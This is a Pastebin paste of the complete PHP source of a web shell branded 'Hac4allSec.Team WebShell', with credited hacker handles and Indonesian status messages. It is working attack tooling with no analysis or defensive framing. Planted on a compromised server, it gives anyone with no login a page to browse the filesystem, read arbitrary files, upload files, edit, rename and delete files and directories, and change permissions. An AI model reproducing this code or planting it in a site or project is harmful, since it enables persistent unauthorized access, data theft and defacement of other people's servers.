techhjork

Webshell

Sep 27th, 2021
827
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.     <?php
  2. error_reporting(0);
  3. set_time_limit(0);
  4.  
  5. if(get_magic_quotes_gpc()){
  6. foreach($_POST as $key=>$value){
  7. $_POST[$key] = stripslashes($value);
  8. }
  9. }
  10. echo '<!DOCTYPE HTML>
  11. <html>
  12. <head>
  13. <link href="https://fonts.googleapis.com/css2?family=Gemunu+Libre:wght@200&display=swap" rel="stylesheet">
  14. <title>Hac4allSec.Team WebShell</title>
  15. <style>
  16. body{
  17. font-family: "Gemunu Libre";
  18. background-image: url("https://thumbs.gfycat.com/PerkyPlainLacewing-size_restricted.gif");
  19. color:red;
  20. }
  21. #content tr:hover{
  22. background-color: black;
  23. text-shadow:0px 0px 10px #fff;
  24. }
  25. #content .first{
  26. background-color: black;
  27. }
  28. table{
  29. border: 1px #fc0000 dotted;
  30. }
  31. a{
  32. color:white;
  33. text-decoration: none;
  34. }
  35. a:hover{
  36. color:red;
  37. text-shadow:0px 0px 10px #ffffff;
  38. }
  39. input,select,textarea{
  40. border: 1px #000000 solid;
  41. -moz-border-radius: 5px;
  42. -webkit-border-radius:5px;
  43. border-radius:7px;
  44. }
  45. </style>
  46. </head>
  47. <body>
  48. <center><img alt="WHY ME" height="226px; " id="Header1_headerimg" src="https://i.postimg.cc/3wmcMx7z/MOSHED-2021-9-24-12-20-28.gif" style="display: block" width="244px; "></center>
  49. <h1><center><font color="red">Hac4allSecTeam WebShell</font></center></h1>
  50. <font color="red" face="courier new"><marquee bgcolor="black">-| Mr.SoLo
  51.        | CR4CK3R | D34D_SL33P | SADMAN | Leemcphers | emmytromal | PH_SH1N1G4M1 | MR.H3LLB0Y |-</marquee></font>
  52. <table width="1310" border="0" cellpadding="3" cellspacing="1" align="center">
  53. <tr><td><center><font color="white">Path :</font> ';
  54. if(isset($_GET['path'])){
  55. $path = $_GET['path'];
  56. }else{
  57. $path = getcwd();
  58. }
  59. $path = str_replace('\\','/',$path);
  60. $paths = explode('/',$path);
  61.  
  62. foreach($paths as $id=>$pat){
  63. if($pat == '' && $id == 0){
  64. $a = true;
  65. echo '<a href="?path=/">/</a>';
  66. continue;
  67. }
  68. if($pat == '') continue;
  69. echo '<a href="?path=';
  70. for($i=0;$i<=$id;$i++){
  71. echo "$paths[$i]";
  72. if($i != $id) echo "/";
  73. }
  74. echo '">'.$pat.'</a>/';
  75. }
  76. echo '</td></tr><tr><td>';
  77. if(isset($_FILES['file'])){
  78. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  79. echo '<center><font color="green">Success</font><br />';
  80. }else{
  81. echo '<font color="red">Upload Gagal</font><br/>';
  82. }
  83. }
  84. echo '<form enctype="multipart/form-data" method="POST">
  85. <center><font color="white">File Upload :</font> <input type="file" name="file" />
  86. <input type="submit" value="upload" />
  87. </form>
  88. </td></tr>';
  89. if(isset($_GET['filesrc'])){
  90. echo "<tr><td>Current File : ";
  91. echo $_GET['filesrc'];
  92. echo '</tr></td></table><br />';
  93. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  94. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  95. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  96. if($_POST['opt'] == 'chmod'){
  97. if(isset($_POST['perm'])){
  98. if(chmod($_POST['path'],$_POST['perm'])){
  99. echo '<font color="green">Change Permission Berhasil</font><br/>';
  100. }else{
  101. echo '<font color="red">Change Permission Gagal</font><br />';
  102. }
  103. }
  104. echo '<form method="POST">
  105. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  106. <input type="hidden" name="path" value="'.$_POST['path'].'">
  107. <input type="hidden" name="opt" value="chmod">
  108. <input type="submit" value="Go" />
  109. </form>';
  110. }elseif($_POST['opt'] == 'rename'){
  111. if(isset($_POST['newname'])){
  112. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  113. echo '<font color="green">Ganti Nama Berhasil</font><br/>';
  114. }else{
  115. echo '<font color="red">Ganti Nama Gagal</font><br />';
  116. }
  117. $_POST['name'] = $_POST['newname'];
  118. }
  119. echo '<form method="POST">
  120. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  121. <input type="hidden" name="path" value="'.$_POST['path'].'">
  122. <input type="hidden" name="opt" value="rename">
  123. <input type="submit" value="Go" />
  124. </form>';
  125. }elseif($_POST['opt'] == 'edit'){
  126. if(isset($_POST['src'])){
  127. $fp = fopen($_POST['path'],'w');
  128. if(fwrite($fp,$_POST['src'])){
  129. echo '<font color="green">Berhasil Edit File</font><br/>';
  130. }else{
  131. echo '<font color="red">Gagal Edit File</font><br/>';
  132. }
  133. fclose($fp);
  134. }
  135. echo '<form method="POST">
  136. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  137. <input type="hidden" name="path" value="'.$_POST['path'].'">
  138. <input type="hidden" name="opt" value="edit">
  139. <input type="submit" value="Save" />
  140. </form>';
  141. }
  142. echo '</center>';
  143. }else{
  144. echo '</table><br/><center>';
  145. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  146. if($_POST['type'] == 'dir'){
  147. if(rmdir($_POST['path'])){
  148. echo '<font color="green">Directory Terhapus</font><br/>';
  149. }else{
  150. echo '<font color="red">Directory Gagal Terhapus                                                                                                                                                                                                                                                                                             </font><br/>';
  151. }
  152. }elseif($_POST['type'] == 'file'){
  153. if(unlink($_POST['path'])){
  154. echo '<font color="green">Success Deleted</font><br/>';
  155. }else{
  156. echo '<font color="red">File Gagal Dihapus</font><br/>';
  157. }
  158. }
  159. }
  160. echo '</center>';
  161. if(function_exists('opendir')) {
  162.     if($opendir = opendir($path)) {
  163.         while(($readdir = readdir($opendir)) !== false) {
  164.             $scandir[] = $readdir;
  165.         }
  166.         closedir($opendir);
  167.     }
  168.     sort($scandir);
  169. } else {
  170.     $scandir = scandir($path);
  171. }
  172. echo '<div id="content"><table width="1310" border="0" cellpadding="3" cellspacing="1" align="center">
  173. <tr class="first">
  174. <td><center>Name</peller></center></td>
  175. <td><center>Size</peller></center></td>
  176. <td><center>Permission</peller></center></td>
  177. <td><center>Modify</peller></center></td>
  178. </tr>';
  179.  
  180. foreach($scandir as $dir){
  181. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  182. echo '<tr>
  183. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
  184. <td><center>--</center></td>
  185. <td><center>';
  186. if(is_writable($path.'/'.$dir)) echo '<font color="green">';
  187. elseif(!is_readable($path.'/'.$dir)) echo '<font color="blue">';
  188. echo perms($path.'/'.$dir);
  189. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
  190.  
  191. echo '</center></td>
  192. <td><center><form method="POST" action="?option&path='.$path.'">
  193. <select name="opt">
  194. <option value="">Select</option>
  195. <option value="delete">Delete</option>
  196. <option value="chmod">Chmod</option>
  197. <option value="rename">Rename</option>
  198. </select>
  199. <input type="hidden" name="type" value="dir">
  200. <input type="hidden" name="name" value="'.$dir.'">
  201. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
  202. <input type="submit" value=">">
  203. </form></center></td>
  204. </tr>';
  205. }
  206. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  207. foreach($scandir as $file){
  208. if(!is_file($path.'/'.$file)) continue;
  209. $size = filesize($path.'/'.$file)/1024;
  210. $size = round($size,3);
  211. if($size >= 1024){
  212. $size = round($size/1024,2).' MB';
  213. }else{
  214. $size = $size.' KB';
  215. }
  216.  
  217. echo '<tr>
  218. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
  219. <td><center>'.$size.'</center></td>
  220. <td><center>';
  221. if(is_writable($path.'/'.$file)) echo '<font color="green">';
  222. elseif(!is_readable($path.'/'.$file)) echo '<font color="blue">';
  223. echo perms($path.'/'.$file);
  224. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
  225. echo '</center></td>
  226. <td><center><form method="POST" action="?option&path='.$path.'">
  227. <select name="opt">
  228. <option value="">Select</option>
  229. <option value="delete">Delete</option>
  230. <option value="chmod">Chmod</option>
  231. <option value="rename">Rename</option>
  232. <option value="edit">Edit</option>
  233. </select>
  234. <input type="hidden" name="type" value="file">
  235. <input type="hidden" name="name" value="'.$file.'">
  236. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
  237. <input type="submit" value=">">
  238. </form></center></td>
  239. </tr>';
  240. }
  241. echo '</table>
  242. </div>';
  243. }
  244. echo '<center><br/> Hac4allSec.Team WebShell </center>
  245. </body>
  246. </html>';
  247. function perms($file){
  248. $perms = fileperms($file);
  249.  
  250. if (($perms & 0xC000) == 0xC000) {
  251. // Socket
  252. $info = 's';
  253. } elseif (($perms & 0xA000) == 0xA000) {
  254. // Symbolic Link
  255. $info = 'l';
  256. } elseif (($perms & 0x8000) == 0x8000) {
  257. // Regular
  258. $info = '-';
  259. } elseif (($perms & 0x6000) == 0x6000) {
  260. // Block special
  261. $info = 'b';
  262. } elseif (($perms & 0x4000) == 0x4000) {
  263. // Directory
  264. $info = 'd';
  265. } elseif (($perms & 0x2000) == 0x2000) {
  266. // Character special
  267. $info = 'c';
  268. } elseif (($perms & 0x1000) == 0x1000) {
  269. // FIFO pipe
  270. $info = 'p';
  271. } else {
  272. // Unknown
  273. $info = 'u';
  274. }
  275.  
  276. // Owner
  277. $info .= (($perms & 0x0100) ? 'r' : '-');
  278. $info .= (($perms & 0x0080) ? 'w' : '-');
  279. $info .= (($perms & 0x0040) ?
  280. (($perms & 0x0800) ? 's' : 'x' ) :
  281. (($perms & 0x0800) ? 'S' : '-'));
  282.  
  283. // Group
  284. $info .= (($perms & 0x0020) ? 'r' : '-');
  285. $info .= (($perms & 0x0010) ? 'w' : '-');
  286. $info .= (($perms & 0x0008) ?
  287. (($perms & 0x0400) ? 's' : 'x' ) :
  288. (($perms & 0x0400) ? 'S' : '-'));
  289.  
  290. // World
  291. $info .= (($perms & 0x0004) ? 'r' : '-');
  292. $info .= (($perms & 0x0002) ? 'w' : '-');
  293. $info .= (($perms & 0x0001) ?
  294. (($perms & 0x0200) ? 't' : 'x' ) :
  295. (($perms & 0x0200) ? 'T' : '-'));
  296.  
  297. return $info;
  298. }
  299. ?>
RAW Paste Data